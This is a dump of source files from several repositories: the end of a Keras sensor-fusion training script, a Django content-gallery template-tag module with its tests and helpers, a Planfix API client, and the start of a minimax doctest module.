print(self.mix_model.summary())
return self.r
#r = model.fit(x = [np.expand_dims(self.split[0],-1),np.expand_dims(self.split[2],-1)], y = self.split[4], validation_data = ([np.expand_dims(self.split[1],-1),np.expand_dims(self.split[3],-1)],self.split[5]), epochs = 50, batch_size = 32 )
def draw(self):
f1 = plt.figure(1)
plt.title('Loss')
plt.plot(self.r.history['loss'], label = 'loss')
plt.plot(self.r.history['val_loss'], label = 'val_loss')
plt.legend()
f1.show()
f2 = plt.figure(2)
plt.plot(self.r.history['acc'], label = 'accuracy')
plt.plot(self.r.history['val_acc'], label = 'val_accuracy')
plt.legend()
f2.show()
# summary, confusion matrix and heatmap
def con_matrix(self,n):
K = len(set(self.split[-2]))
self.y_pred = self.mix_model.predict([np.expand_dims(self.split[i],-1) for i in range(2*n) if i % 2 != 0]).argmax(axis=1)
cm = confusion_matrix(self.split[-1],self.y_pred)
self.plot_confusion_matrix(cm,list(range(K)))
def plot_confusion_matrix(self, cm, classes, normalize = False, title='Confusion matrix', cmap=plt.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:,np.newaxis]
print("Normalized confusion matrix")
else:
print("Confusion matrix, without normalization")
print(cm)
f3 = plt.figure(3)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max()/2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment = "center",
color = "white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('predicted label')
f3.show()
if __name__ == "__main__":
model_name = "cnn" # can be cnn/dnn/rnn
paths = ["./bag.h5","./image_for_fusion.h5"] # a motion data fuses with video data
#paths = ["./bag.h5", "./hand.h5", "./hip.h5","./torso.h5", "./image_for_fusion.h5"]
mix = models()
print("read h5 file....")
data_array = mix.read_h5(paths)
mix.merge_models(len(paths))
mix.draw()
mix.con_matrix(len(paths))
```
|
{
"source": "jenia0jenia/django-content-gallery",
"score": 2
}
|
#### File: content_gallery/templatetags/content_gallery.py
```python
import json
from django import template
from django.utils import html
from .. import settings
from .. import utils
register = template.Library()
@register.simple_tag
def gallery_image_data(obj):
"""
Returns data of the image related to the object.
Used to construct previews.
"""
# get the first image related to the object
image = utils.get_first_image(obj)
try:
# get data related to the object if the image exists
data = {
'app_label': image.content_type.app_label,
'content_type': image.content_type.model,
'object_id': str(image.object_id)
}
except AttributeError:
# set empty data if the image does not exist
data = {}
# return the image and data in JSON format
data_json = json.dumps(data)
return {
'image': image,
'data_image': html.escape(data_json)
}
@register.inclusion_tag('content_gallery/templatetags/preview.html')
def gallery_preview(obj):
"""
Returns a large preview of the first image related to the object
"""
# preview dimensions used in its template
context = {
'image_width': settings.CONF['preview_width'],
'image_height': settings.CONF['preview_height'],
'div_width': settings.CONF['preview_width'] + 14,
'div_height': settings.CONF['preview_height'] + 14,
'zoom_left': settings.CONF['preview_width'] - 55
}
# get image data
image_data = gallery_image_data(obj)
# add the image data to the context
context.update(image_data)
# return context to render the template
return context
@register.inclusion_tag('content_gallery/templatetags/small_preview.html')
def gallery_small_preview(obj):
"""
Returns a small preview of the first image related to the object
"""
# preview dimensions used in its template
context = {
'image_width': settings.CONF['small_preview_width'],
'image_height': settings.CONF['small_preview_height'],
'div_width': settings.CONF['small_preview_width'] + 14,
'div_height': settings.CONF['small_preview_height'] + 14,
'zoom_left': settings.CONF['small_preview_width'] - 15
}
# get image data
image_data = gallery_image_data(obj)
# add the image data to the context
context.update(image_data)
# return context to render the template
return context
@register.simple_tag
def gallery_data_url_pattern():
"""
Returns gallery data URL pattern used by JavaScript code.
The template tag is used in the gallery template.
"""
return utils.get_gallery_data_url_pattern()
@register.filter
def obfuscate(path):
"""
Returns the link to the original static file in DEBUG mode
of to the obfuscated file if the DEBUG is False.
"""
return utils.get_obfuscated_file(path)
```
#### File: content_gallery/tests/test_widgets.py
```python
import json
from django.test import mock, TestCase
from django.contrib.contenttypes.models import ContentType
from django.forms import Select
from django.db.models import BLANK_CHOICE_DASH
from django.contrib.admin.widgets import AdminFileWidget
from django.core.files.uploadedfile import InMemoryUploadedFile
from .. import widgets
from .. import utils
from .. import fields
from .models import *
from .base_test_cases import *
from .utils import patch_settings
class TestContentTypeSelect(TestCase):
"""
Tests for the widget for selecting models in the Image admin
"""
def test_filter_choices(self):
"""
Checks whether the _filter_choices method removes from
the choices list all models unless it has the gallery_visible
attribute with True value. Also an empty choice should remain
"""
# create a choice of TestModel (gallery_visible=True)
ctype = ContentType.objects.get_for_model(TestModel)
test_choice = (str(ctype.pk), ctype.name)
# create a choice of AnotherTestModel (gallery_visible=False)
ctype = ContentType.objects.get_for_model(AnotherTestModel)
another_choice = (str(ctype.pk), ctype.name)
# create a choice of WrongTestModel (has not gallery_visible)
ctype = ContentType.objects.get_for_model(WrongTestModel)
wrong_choice = (str(ctype.pk), ctype.name)
# create a mock widget object
widget = mock.MagicMock(spec=widgets.ContentTypeSelect)
# set initial choices
widget.choices = [
("", "----"),
test_choice,
another_choice,
wrong_choice
]
# call the _filter_choices method
widgets.ContentTypeSelect._filter_choices(widget)
# check whether an empty choice is in the list
self.assertIn(("", "----"), widget.choices)
# check whether the TestModel choice is in the list
self.assertIn(test_choice, widget.choices)
# check whether the AnotherTestModel choice is not in the list
self.assertNotIn(another_choice, widget.choices)
# check whether the WrongTestModel choice is not in the list
self.assertNotIn(wrong_choice, widget.choices)
@mock.patch('django.utils.safestring.mark_safe', return_value='baz')
def test_render_with_mark_safe(self, mark_safe):
"""
Checks whether the widget is rendered properly
"""
# create a mock widget object
widget = mock.MagicMock(spec=widgets.ContentTypeSelect)
# set the js template
# it should contain %s for URL pattern subtitution
widget.js = " %s"
# patch the get_choices_url_pattern helper function
# so that it returns known value
with mock.patch.object(
utils,
'get_choices_url_pattern',
return_value='foo'
) as get_url_pattern, mock.patch.object(
Select, # patch parent's method
'render',
return_value='bar'
) as render:
# call the render method
result = widgets.ContentTypeSelect.render(widget, 'name', 'value')
# check whether the helper function has been called
get_url_pattern.assert_called_with()
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', 'value', None)
# check whether the mark_safe function has been called with rendered
# template containing a result of the parent's method + the js
# pattern where %s is replaced with the URL pattern
# i.e. 'bar' + ' %s' % 'foo'
mark_safe.assert_called_with('bar foo')
# check whether the render method returns a result of the mark_safe
self.assertEqual(result, "baz")
class TestObjectIdSelect(TestCase):
"""
Tests for the widget for selecting the object of the model
"""
@classmethod
def setUpClass(cls):
"""
Creates two objects of the TestModel in the database
"""
cls.widget = mock.MagicMock(spec=widgets.ObjectIdSelect)
cls.object1 = TestModel.objects.create(name="Test object 1")
cls.object2 = TestModel.objects.create(name="Test object 2")
@classmethod
def tearDownClass(cls):
"""
Deletes all created objects
"""
cls.object1.delete()
cls.object2.delete()
def setUp(self):
"""
Creates a mock widget object
"""
self.widget = mock.MagicMock(spec=widgets.ObjectIdSelect)
def test_create_choices_objects_exist(self):
"""
Checks whether the _create_choices method creates choices for
all objects of the selected model if objects exist. Also the list
should include an empty choice.
"""
# set selected model class with existing objects
self.widget.model_class = TestModel
# call the _create_choices method
widgets.ObjectIdSelect._create_choices(self.widget)
# check whether the list contains an empty choice
self.assertIn(BLANK_CHOICE_DASH[0], self.widget.choices)
# create choices
choice1 = (str(self.object1.pk), self.object1)
choice2 = (str(self.object2.pk), self.object2)
# check whether the list contains both TestModel objects
self.assertIn(choice1, self.widget.choices)
self.assertIn(choice2, self.widget.choices)
# check whether there are 3 choices so the list contains nothing
# but two objects of the TestModel and an empty choice
self.assertEqual(len(self.widget.choices), 3)
def test_create_choices_objects_do_not_exist(self):
"""
Checks whether the _create_choices method creates an empty choice
only if there is no objects of the selected model
"""
# set selected model class without existing objects
self.widget.model_class = AnotherTestModel
# call the _create_choices method
widgets.ObjectIdSelect._create_choices(self.widget)
# check whether the list contains only one choice
self.assertEqual(len(self.widget.choices), 1)
# check whether an empty choice presents in the list
self.assertIn(BLANK_CHOICE_DASH[0], self.widget.choices)
def test_render(self):
"""
Checks whether the render method calls the _create_choices method
and returns a result of parent's render method. The _create_choices
should be called before the parent's render.
"""
# create a mock for logging calls to determine call order
call_logger = mock.Mock()
# attach the _create_choices mock to the logger
call_logger.attach_mock(self.widget._create_choices, 'create_choices')
# patch the parent's render method
with mock.patch.object(
Select,
'render',
return_value='foo'
) as render:
# attach the parent's render mock to the logger
call_logger.attach_mock(render, 'parent_render')
# call the render method
result = widgets.ObjectIdSelect.render(self.widget, 'name', 'value')
# check whether the method returns the result of the parent's render
self.assertEqual(result, 'foo')
# create an expected calls list where the create_choices is called
# before the parent's render
expected_calls = [
mock.call.create_choices(),
# the parent's render should be called with the same arguments
mock.call.parent_render('name', 'value', None)
]
# check whether functions has been called in the proper order
self.assertListEqual(call_logger.mock_calls, expected_calls)
class TestImageWidget(TestCase):
"""
Tests for the widget displaying a preview of image in the Image admin
"""
def setUp(self):
"""
Creates a mock widget object
"""
self.widget = mock.MagicMock(spec=widgets.ImageWidget)
def test_render_without_image(self):
"""
Checks whether the template_with_initial is not affected by
the render method if it has been called without an image
"""
# set initial template_with_initial value
self.widget.template_with_initial = "bar"
# patch parent's render method
with mock.patch.object(
AdminFileWidget,
'render',
return_value='foo'
) as render:
# call the method with None image argument
result = widgets.ImageWidget.render(self.widget, 'name', None)
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', None, None)
# check whether the method returns the result of the parent's method
self.assertEqual(result, 'foo')
# check whether the template_with_initial has not been changed
self.assertEqual(self.widget.template_with_initial, 'bar')
@mock.patch('django.utils.html.escape', return_value='escaped data')
def test_render_with_image(self, escape):
"""
Checks whether the template_with_initial is filled properly
if the render method has been called with saved image
"""
# set initial template_with_initial value
self.widget.template = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}"
# create a mock image field file object
image = mock.MagicMock(spec=fields.GalleryImageFieldFile)
# set known settings and patch helper functions
with patch_settings(
{
'preview_width': 400,
'preview_height': 300,
}
), mock.patch.object(
utils,
'create_image_data',
return_value='data'
) as create_data, mock.patch.object(
utils,
'create_static_url',
return_value='url'
) as create_url, mock.patch.object(
AdminFileWidget, # patch the parent's render method
'render',
return_value='foo'
) as render:
# call the method with an image field file mock
result = widgets.ImageWidget.render(self.widget, 'name', image)
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', image, None)
# check whether tha create_static_url helper function has been
# called with the path to zoom image
create_url.assert_called_with("content_gallery/img/zoom.png")
# check whether the create_image_data helper function has been
# called with the image filed file mock
create_data.assert_called_with(image)
# check whether the escape has been called with the returned by
# create_image_data value in JSON format
escape.assert_called_with(json.dumps('data'))
# check whether the method returns the result of the parent's method
self.assertEqual(result, 'foo')
# check whether the template has been filled properly
self.assertEqual(
self.widget.template_with_initial,
"\n".join([
# the size of the container
str(400 + 14),
str(300 + 14),
# the size of the image
str(400),
str(300),
# the line-height
str(300),
# the result of the escape function
"escaped data",
# the result of create_static_url function
"url",
# the left offset of the zoom image
str(400 - 55)
])
)
def test_render_with_uploaded_image(self):
"""
Checks whether the template_with_initial is not affected by
the render method if it has been called with just uploaded image
"""
# set initial template_with_initial value
self.widget.template_with_initial = "bar"
# create a mock object of just uploaded image
image = mock.MagicMock(spec=InMemoryUploadedFile)
# patch the parent's render method
with mock.patch.object(
AdminFileWidget,
'render',
return_value='foo'
) as render:
# call the method with just uploaded image mock
result = widgets.ImageWidget.render(self.widget, 'name', image)
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', image, None)
# check whether the method returns the result of the parent's method
self.assertEqual(result, 'foo')
# check whether the template_with_initial has not been changed
self.assertEqual(self.widget.template_with_initial, 'bar')
class TestImageInlineWidget(TestCase):
"""
Tests for the widget displaying a small preview of image in inline admins
"""
def setUp(self):
"""
Creates a mock widget object
"""
self.widget = mock.MagicMock(spec=widgets.ImageInlineWidget)
def test_render_without_image(self):
"""
Checks whether the render method returns an empty string if
it has been called None image argument
"""
# call the method with None image argument
result = widgets.ImageInlineWidget.render(self.widget, 'name', None)
# check whether the result is an empty string
self.assertEqual(result, "")
@mock.patch('django.template.loader.render_to_string', return_value="foo")
def test_render_with_image(self, render_to_string):
"""
Checks whether the render method returns a result of
the render_to_string function if the method has been
called with an image
"""
# set a template name
self.widget.template_name = "bar"
# create an image mock
image = mock.MagicMock()
# set an URL of the small preview
image.small_preview_url = 'url'
# patch the create_image_url so that it returns known result
with mock.patch.object(
utils,
'create_image_data',
return_value='data'
) as create_data:
# call the method with the image mock
result = widgets.ImageInlineWidget.render(
self.widget,
'name',
image
)
# check whether the create_image_data helper function has been
# called with the image
create_data.assert_called_with(image)
# check whether the method returns the result of
# the render_to_string function
self.assertEqual(result, "foo")
# check whether the render_to_string function has been called
# with proper arguments
render_to_string.assert_called_with(
'bar', # the template name
{
'preview_src': 'url', # the URL of small preview
# the result of the create_image_data function
# in JSON format
'image_data': json.dumps('data')
}
)
```
#### File: content_gallery/tests/utils.py
```python
import sys
from io import BytesIO
from contextlib import contextmanager
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from .. import settings
from .. import models
from .models import *
def get_image_data():
"""
Returns the BytesIO object containing an Image data
"""
io = BytesIO()
# create filled with red color image 200x200 px
size = (200, 200)
color = (255, 0, 0, 0)
image = Image.new("RGB", size, color)
# save the image data in JPEG format to the io buffer
image.save(io, format='JPEG')
io.seek(0) # seek to the beginning
return io
def get_image_in_memory_data():
"""
Creates the InMemoryUploadedFile object using thedata from io
to save it into the ImageField of the database
"""
io = get_image_data() # get a red rectangle 200x200px
# create the InMemoryUploadedFile object with the 'foo.jpg' file
image_file = InMemoryUploadedFile(io, None, 'foo.jpg',
'jpeg', sys.getsizeof(io), None)
image_file.seek(0) # seek to the beginning
return image_file
def create_image_file(name):
"""
Saves the image data to the file
"""
io = get_image_data() # get a red rectangle 200x200px
# save it into the file
with open(name, 'wb') as f:
f.write(io.read())
def get_image_size(path):
"""
Returns the size of the image
"""
with Image.open(path) as img:
return img.size
@contextmanager
def patch_settings(settings_dict):
"""
Temporary replaces values in the ContentGallery
settings with values from the dictionary
"""
saved_settings = {}
for key, value in settings_dict.items():
# save the original value
saved_settings[key] = settings.CONF[key]
# set the fake value
settings.CONF[key] = value
# stop here until the context manager exits
yield
# restore the original settings
settings.CONF.update(saved_settings)
def clean_db():
"""
Removes all objects from the test database
"""
TestModel.objects.all().delete()
AnotherTestModel.objects.all().delete()
WrongTestModel.objects.all().delete()
models.Image.objects.all().delete()
```
|
{
"source": "jenia0jenia/django-planfix",
"score": 3
}
|
#### File: django-planfix/planfix/api.py
```python
from .classes import PlanFixBase, PlanfixError
from .utils import print_parser
from xml.etree import ElementTree
from collections import OrderedDict
class PlanFix(PlanFixBase):
"""
https://planfix.ru/docs/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_%D1%84%D1%83%D0%BD%D0%BA%D1%86%D0%B8%D0%B9
"""
def project_get_list(self, cur_page=1, target='all'):
if not str(cur_page).isdigit():
cur_page = 1
self.method = 'project.getList'
self.scheme = {'account', 'sid', 'pageCurrent', 'target'}
params = {'account': self.account,
'sid': self.sid,
'pageCurrent': str(cur_page),
'target': target}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('projects')
return [(item.find('id').text, item.find('title').text) for item in rt]
except PlanfixError as e:
return None
def contact_get_list(self, cur_page=1, search=''):
if not str(cur_page).isdigit():
cur_page = 1
self.method = 'contact.getList'
self.scheme = {'account', 'sid', 'pageCurrent', 'pageSize', 'search'}
params = {'account': self.account,
'sid': self.sid,
'pageCurrent': str(cur_page),
'pageSize': '100',
'search': search}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('contacts')
total = rt.attrib['totalCount']
return [(item.find('userid').text, item.find('email').text) for item in rt]
except PlanfixError as e:
return None
def contact_get(self, **kwargs):
self.method = 'contact.get'
self.scheme = ['account',
'sid',
{'contact': ['id', 'general']}
]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('contact').find('userid').text
except PlanfixError as e:
return None
def contact_add(self, **kwargs):
self.method = 'contact.add'
self.scheme = ['account',
'sid',
{'contact': ['template',
'name',
'lastName',
'post',
'email',
'mobilePhone',
'workPhone',
'homePhone',
'address',
'description',
'sex',
'skype',
'icq',
'vk',
'birthdate',
'lang',
'isCompany',
'canBeWorker',
'canBeClient'
]}
]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('contact').find('userid').text
except PlanfixError as e:
# E-mail, указанный для логина, не уникален
if e.message == '8007':
return self.contact_get_list(search=kwargs['email'])[0][0]
def task_get_list(self, target='template'):
self.method = 'task.getList'
self.custom_scheme = []
self.scheme = {'account', 'sid', 'target', 'pageCurrent'}
params = {'account': self.account,
'sid': self.sid,
'pageCurrent': '1',
'target': target}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('tasks')
return [(item.find('id').text, item.find('title').text) for item in rt]
except PlanfixError as e:
return None
def task_get_list_of_status(self, *args, **kwargs):
self.method = 'taskStatus.getListOfSet'
self.custom_scheme = []
self.scheme = ['account',
'sid',
{'taskStatusSet': ['id']}
]
params = {'account': self.account,
'sid': self.sid}
params.update(kwargs)
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('taskStatuses')
return [(item.find('id').text, item.find('name').text) for item in rt]
except PlanfixError as e:
return None
def task_change_status(self, id, status):
self.method = 'task.changeStatus'
self.custom_scheme = []
self.scheme = ['account',
'sid',
{'task': ['id', 'general']},
'status',
'dateTime',
]
params = {'account': self.account,
'sid': self.sid,
'id': id,
'status': status}
try:
response = ElementTree.fromstring(self.connect(**params))
return response.find('task').find('id').text
except PlanfixError as e:
return None
def task_add(self, *args, **kwargs):
self.method = "task.add"
self.scheme = ['account',
'sid',
{'task': ['template',
'title',
'description',
'importance',
'status',
{'owner': 'id'},
'statusSet',
'checkResult',
{'project': 'id'},
'startDateIsSet',
'startDate',
'startTimeIsSet',
'startTime',
'endDateIsSet',
'endDate',
'endTimeIsSet',
'endTime',
# {'customData': 'customValue'}
]
}]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('task').find("id").text
except PlanfixError as e:
return None
# def task_add_v2(self, *args, **kwargs):
# self.method = "task.add"
# self.scheme = ['account',
# 'sid',
# {'task': ['template',
# 'title',
# 'description',
# 'importance',
# 'status',
# {'owner': 'id'},
# 'statusSet',
# 'checkResult',
# {'project': 'id'},
# 'startDateIsSet',
# 'startDate',
# 'startTimeIsSet',
# 'startTime',
# 'endDateIsSet',
# 'endDate',
# 'endTimeIsSet',
# 'endTime',
# {'customData': 'customValue'}]
# }]
# try:
# response = ElementTree.fromstring(self.connect(**kwargs))
# return response.find('task').find("id").text
# except PlanfixError as e:
# return None
def task_get(self, id):
self.method = "task.get"
self.scheme = ['account',
'sid',
{'task': ['id']}
]
params = {'account': self.account,
'sid': self.sid,
'id': id}
try:
response = self.connect(**params)
return response
except PlanfixError as e:
return e
def task_get_field_value(self, id, custom_data_id):
task_get_res = self.task_get(id)
if isinstance(task_get_res, PlanfixError):
return task_get_res
root = ElementTree.fromstring(task_get_res)
custom_data = root.find('task').find('customData').findall('customValue')
for custom_value in custom_data:
if custom_data_id == custom_value.find('field').find('id').text:
return [int(value.text) for value in custom_value.findall('value')]
def task_update(self, *args, **kwargs):
self.method = "task.update"
self.scheme = ['account',
'sid',
{'task': ['id',
'silent',
'title',
'general',
'checkResult',
'description',
'importance',
'status',
{'owner': 'id'},
'statusSet',
'checkResult',
{'project': 'id'},
'startDateIsSet',
'startDate',
'startTimeIsSet',
'startTime',
'endDateIsSet',
'endDate',
'endTimeIsSet',
'endTime',
{'customData': 'customValue'}, # customValue = [id, value]
]}
]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('task').find("id").text
except PlanfixError as e:
return None
def task_update_v2(self, *args, **kwargs):
self.method = "task.update"
xml_values = {}
xml_values['@method'] = self.method
xml_values['account'] = self.account
xml_values['sid'] = self.sid
xml_values['silent'] = "1"
task = {}
task['id'] = kwargs.get('taskId')
task['customData'] = {}
task['customData']['customValue'] = []
for custom_data in kwargs.get('custom_data'):
task['customData']['customValue'].append({
'id': custom_data['id'],
'value': custom_data['value'],
})
xml_values['task'] = task
try:
return self.connect_v2(xml_values, **kwargs)
# response = ElementTree.fromstring(self.connect_v2(xml_values, **kwargs))
# return response.find('task').find("id").text
except PlanfixError as e:
return None
def handbook_get_group_list(self, *args, **kwargs):
self.method = 'handbook.getGroupList'
self.scheme = ['account', 'sid']
params = {'account': self.account,
'sid': self.sid}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('handbookGroups')
return [(group.find('id').text, group.find('name').text) for group in rt]
except PlanfixError as e:
return None
def handbook_get_list(self, *args, **kwargs):
self.method = 'handbook.getList'
self.scheme = ['account',
'sid',
{'group': 'id'}]
params = {'account': self.account,
'sid': self.sid}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('handbooks')
return [(group.find('id').text, group.find('name').text) for group in rt]
except PlanfixError as e:
return None
def handbook_get_records(self, handbook, *args, **kwargs):
self.method = 'handbook.getRecords'
self.scheme = ['account',
'sid',
{'handbook': 'id'},
'parentKey',
'pageCurrent',
'pageSize',
]
params = {'account': self.account,
'sid': self.sid,
'handbook': handbook,
}
if "parentKey" in kwargs:
params["parentKey"] = kwargs["parentKey"]
if "pageCurrent" in kwargs:
params["pageCurrent"] = kwargs["pageCurrent"]
if "pageSize" in kwargs:
params["pageSize"] = kwargs["pageSize"]
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('records')
result = dict()
for record in rt:
result[record.find('key').text] = \
record.find('customData').find('customValue').find('value').text
return result
except PlanfixError as e:
return None
def analitic_get_group_list(self):
self.method = 'analitic.getGroupList'
self.scheme = {'account', 'sid'}
params = {'account': self.account,
'sid': self.sid,}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('analiticGroups')
count_groups = rt.attrib['count']
total = rt.attrib['totalCount']
return [(item.find('id').text, item.find('name').text) for item in rt]
except PlanfixError as e:
return None
def analitic_get_list(self, groupId):
self.method = 'analitic.getList'
self.scheme = {'account', 'sid'}
params = {'account': self.account,
'analiticGroup': groupId,
'sid': self.sid,}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('analitics')
count_groups = rt.attrib['count']
total = rt.attrib['totalCount']
return [(item.find('id').text, item.find('name').text) for item in rt]
except PlanfixError as e:
return None
def action_add(self, *args, **kwargs):
self.method = 'action.add'
xml_values = {}
xml_values['@method'] = self.method
xml_values['account'] = self.account
xml_values['sid'] = self.sid
analitic = {}
analitic['id'] = kwargs.get('analiticId')
analitic['analiticData'] = {}
analitic['analiticData']['itemData'] = []
for a_data in kwargs.get('analitic_data'):
analitic['analiticData']['itemData'].append({
'fieldId': a_data['field_id'],
'value': a_data['value']
})
xml_values['action'] = {
'description': kwargs.get('description'),
# 'task': {'general': kwargs.get('taskGeneral')},
'task': {'id': kwargs.get('taskId')},
# {'contact': 'general'},
'taskNewStatus': kwargs.get('taskNewStatus'),
'notifiedList': {'user': kwargs.get('userIdList')},
# 'isHidden': kwargs.get('isHidden'),
# 'owner': {'id': kwargs.get('ownerId')},
# 'dateTime': kwargs.get('dateTime'),
'analitics': {'analitic': analitic}
}
try:
response = ElementTree.fromstring(self.connect_v2(xml_values, **kwargs))
print(response)
rt = response.find('action')
return rt.find('id').text
except PlanfixError as e:
return None
def action_get_list(self, _id):
self.method = 'action.getList'
xml_values = {}
xml_values['@method'] = self.method
xml_values['account'] = self.account
xml_values['sid'] = self.sid
xml_values['task'] = {'general': _id}
try:
response = ElementTree.fromstring(self.connect_v2(xml_values, **kwargs))
rt = response.find('action')
xml_string = self.connect(**params)
res = xmltodict.parse(xml_string)
return res
except PlanfixError as e:
return None
def action_get(self, action_id):
self.method = 'action.get'
self.scheme = ['account',
{'action': 'id'},
'sid',
]
params = {'account': self.account,
'action': action_id,
'sid': self.sid,}
try:
xml_string = self.connect(**params)
res = xmltodict.parse(xml_string)
return res
except PlanfixError as e:
return None
```
#### File: django-planfix/planfix/classes.py
```python
import requests
from hashlib import md5
from xml.etree import ElementTree
from django.core.cache import cache
import xmltodict
class PlanfixError(Exception):
"""Exception raised for errors in the PLANFIX requests.
Attributes:
code -- planfix error code
message -- explanation of the error
"""
def __init__(self, code='', message=''):
self.code = code
self.message = message
class PlanFixBase(object):
CACHE_TIMELIFE = 20
request_templ = """<?xml version="1.0" encoding="UTF-8"?>
<request method="{}">
{}
<signature>{}</signature>
</request>
"""
method = ''
scheme = []
sign = ''
host = ""
api_key = ""
private_key = ""
project_id = ""
user = ""
password = ""
account = ""
level = 0
sid = None
debug = None
def __init__(self, *args, **kwargs):
self.sid = cache.get('planfix_sid')
attr_list = [i.__str__() for i in dir(self) if not i.startswith('__')]
if kwargs:
for item in kwargs.keys():
if item in attr_list:
self.__setattr__(item, kwargs[item])
if not self.sid:
self.auth()
def scheme_sort(self, a):
if isinstance(a, dict):
for i in a.keys():
# a[i] = sorted(a[i], key=self.scheme_sort)
return i
else:
return a
def get_sign(self, **kwargs):
params_list = self.method + \
self.string_by_schemefileds(
self.scheme, **kwargs) + self.private_key
self.sign = md5(params_list.encode('utf-8')).hexdigest()
def string_by_schemefileds(self, element, **kwargs):
result_list = []
element = list(element)
element.sort(key=self.scheme_sort)
for item in element:
if not isinstance(item, dict):
result_list.append(kwargs.get(item, ''))
else:
for key, val in item.items():
if not isinstance(val, list):
if val == 'id':
result_list.append(kwargs.get(key, ''))
elif val == 'customValue':
res = kwargs.get(key, '')
if not res == '' and isinstance(res, list):
result_list.append(str(res[0]) + str(res[1]))
else:
result_list.append(kwargs.get(val, ''))
else:
result_list.append(
self.string_by_schemefileds(val, **kwargs))
return "".join(result_list)
def create_xml_by_scheme(self, element, **kwargs):
result = ""
template = "<%s>%s</%s>"
custom_data_template = "<id>%s</id><value>%s</value>"
sub_result = ''
for item in element:
if not isinstance(item, dict):
if not kwargs.get(item, None) is None:
result += template % (item, kwargs.get(item, ''), item)
else:
for key, val in item.items():
if not isinstance(val, list):
kw_val = kwargs.get(key)
if not kw_val is None:
if val == 'id':
sub_result = template % (val, kw_val, val)
elif val == 'customValue':
if isinstance(kw_val, list):
sub_result = template % \
(val, (custom_data_template % (kw_val[0], kw_val[1])), val)
else:
sub_result = template % (val, kw_val, val)
else:
sub_result = self.create_xml_by_scheme(val, **kwargs)
result += template % (key, sub_result, key)
return result
def connect(self, **kwargs):
if not 'sid' in kwargs and self.sid:
kwargs['sid'] = self.sid
self.get_sign(**kwargs)
body = self.create_xml_by_scheme(self.scheme, **kwargs)
self.print_debug(body)
data = self.request_templ.format(
self.method, body, self.sign).encode('utf-8')
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
content = r.content.decode()
self.print_debug(content)
if self.is_session_valid(content):
return content
elif self.method != 'auth.login':
tmp_params = dict(method=self.method, scheme=self.scheme)
self.auth(renew=True)
self.scheme, self.method = tmp_params['scheme'], tmp_params['method']
return self.connect(**kwargs)
def is_session_valid(self, res):
response = ElementTree.fromstring(res)
if response.attrib['status'] == 'ok':
return True
else:
if response.find('code').text == '0005':
return False
else:
raise PlanfixError(response.find('code').text, response.find('message').text)
def auth(self, renew=False):
if renew or self.sid == None:
self.method = 'auth.login'
self.scheme = ['account', 'login', 'password']
params = {'account': self.account, 'login': self.user, 'password': <PASSWORD>}
response = self.connect(**params)
if self.is_session_valid(response):
root = ElementTree.fromstring(response)
res = root.find('sid')
self.sid = res.text
cache.set('planfix_sid', self.sid, self.CACHE_TIMELIFE*60)
else:
return False
def print_debug(self, msg):
if hasattr(self.debug, '__call__'):
try:
self.debug(msg)
except TypeError as e:
print(e)
def connect_v2(self, xml_values, **kwargs):
if not 'sid' in xml_values and self.sid:
xml_values['sid'] = self.sid
xml_request = {}
xml_request['request'] = xml_values
body = xmltodict.unparse(xml_request)
data = body.encode('utf-8')
self.print_debug(data)
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
content = r.content.decode()
self.print_debug(content)
if self.is_session_valid(content):
return content
elif self.method != 'auth.login':
self.auth(renew=True)
return self.connect_v2(xml_values, **kwargs)
```
|
{
"source": "jenia90/Python",
"score": 4
}
|
#### File: Python/backtracking/minimax.py
```python
from __future__ import annotations
import math
""" Minimax helps to achieve maximum score in a game by checking all possible moves
depth is current depth in game tree.
nodeIndex is index of current node in scores[].
if move is of maximizer return true else false
leaves of game tree is stored in scores[]
height is maximum height of Game tree
"""
def minimax(
depth: int, node_index: int, is_max: bool, scores: list[int], height: float
) -> int:
"""
>>> import math
>>> scores = [90, 23, 6, 33, 21, 65, 123, 34423]
>>> height = math.log(len(scores), 2)
>>> minimax(0, 0, True, scores, height)
65
>>> minimax(-1, 0, True, scores, height)
Traceback (most recent call last):
...
ValueError: Depth cannot be less than 0
>>> minimax(0, 0, True, [], 2)
Traceback (most recent call last):
...
ValueError: Scores cannot be empty
>>> scores = [3, 5, 2, 9, 12, 5, 23, 23]
>>> height = math.log(len(scores), 2)
>>> minimax(0, 0, True, scores, height)
12
>>> minimax('1', 2, True, [], 2 )
Traceback (most recent call last):
...
TypeError: '<' not supported between instances of 'str' and 'int'
"""
if depth < 0:
raise ValueError("Depth cannot be less than 0")
if len(scores) == 0:
raise ValueError("Scores cannot be empty")
if depth == height:
return scores[node_index]
if is_max:
return max(
minimax(depth + 1, node_index * 2, False, scores, height),
minimax(depth + 1, node_index * 2 + 1, False, scores, height),
)
return min(
minimax(depth + 1, node_index * 2, True, scores, height),
